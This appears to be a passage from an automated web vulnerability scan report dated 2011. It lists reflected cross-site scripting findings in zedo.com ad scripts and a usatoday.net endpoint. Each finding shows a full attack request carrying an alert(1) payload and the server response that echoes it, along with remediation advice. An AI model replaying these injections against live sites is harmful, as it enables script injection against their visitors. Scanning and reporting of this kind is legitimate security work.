Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:87099";alert(1)//5fff92f106d;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=158
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:11 GMT
Connection: close
Content-Length: 2013

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',87099";alert(1)//5fff92f106d';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,87099";alert(1)//5fff92f106d;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;


                                                                                                       var zzStr
...[SNIP]...

2.63. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c084f'%3balert(1)//aea7f71949f was submitted in the q parameter. This input was echoed as c084f';alert(1)//aea7f71949f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=c084f'%3balert(1)//aea7f71949f&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=158
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:11 GMT
Connection: close
Content-Length: 2010

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='c084f';alert(1)//aea7f71949f';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=c084f';alert(1)//aea7f71949f;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd
...[SNIP]...

2.64. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bc88"%3balert(1)//bd966777450 was submitted in the q parameter. This input was echoed as 4bc88";alert(1)//bd966777450 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=4bc88"%3balert(1)//bd966777450&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2010

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='4bc88";alert(1)//bd966777450';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=4bc88";alert(1)//bd966777450;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;


                                                                                                       var zzStr
...[SNIP]...

2.65. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5170'%3balert(1)//90fb171ccd1 was submitted in the $ parameter. This input was echoed as c5170';alert(1)//90fb171ccd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=c5170'%3balert(1)//90fb171ccd1&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:c5170';alert(1)//90fb171ccd1;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:10 GMT;path=/;domain=.zedo.com;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2055

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',c5170';alert(1)//90fb171ccd1';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,c5170';alert(1)//90fb171ccd1;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasA
...[SNIP]...

2.66. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37620"%3balert(1)//694f98afb55 was submitted in the $ parameter. This input was echoed as 37620";alert(1)//694f98afb55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=37620"%3balert(1)//694f98afb55&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:37620";alert(1)//694f98afb55;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:10 GMT;path=/;domain=.zedo.com;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2055

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',37620";alert(1)//694f98afb55';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,37620";alert(1)//694f98afb55;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;


                           var zzStr = "s=1;u=5ajh4goBADQAAFjiiCYAAABN~042311;z=
...[SNIP]...

2.67. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9688d'%3balert(1)//fc22f686ec7 was submitted in the q parameter. This input was echoed as 9688d';alert(1)//fc22f686ec7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=9688d'%3balert(1)//fc22f686ec7&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:10 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2052

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='9688d';alert(1)//fc22f686ec7';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=9688d';alert(1)//fc22f686ec7;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd
...[SNIP]...

2.68. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c34aa"%3balert(1)//d137eb38567 was submitted in the q parameter. This input was echoed as c34aa";alert(1)//d137eb38567 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=c34aa"%3balert(1)//d137eb38567&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:10 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2052

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='c34aa";alert(1)//d137eb38567';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=c34aa";alert(1)//d137eb38567;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;


                           var zzStr = "s=1;u=5ajh4goBADQAAFjiiCYAAABN~042311;z=
...[SNIP]...

2.69. http://data.usatoday.net/apps/InsidePage [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://data.usatoday.net
Path:   /apps/InsidePage

Issue detail

The value of the url request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5b62f(a)0ff55e3ea5c was submitted in the url parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/InsidePage?var=blocks&url=5b62f(a)0ff55e3ea5c HTTP/1.1
Host: data.usatoday.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Length: 9474
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Cache-Control: no-cache
Expires: Mon, 09 May 2011 15:38:00 GMT
Date: Mon, 09 May 2011 15:38:00 GMT
Connection: close

var blocks = {"url": "5b62f(a)0ff55e3ea5c","ref": "","title": "5b62f(a)0ff55e3ea5c","section": "5b62f(a)0ff55e3ea5c","nav": "<ul id=\"section-nav\"><li class=\"sectionlabel\">News:</li><li class=\"nav
...[SNIP]...
tData(String retrieverType, String tags, Int32 count, Dictionary`2 dataparms)
at FeedDataService.DataService.GetData()
at SuperFeeds.feed.ProcessRequest(HttpContext context) /feed/most/popular-5b62f(a)0ff55e3ea5c/json/5</div>
...[SNIP]...

2.70. http://data.usatoday.net/apps/InsidePage [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
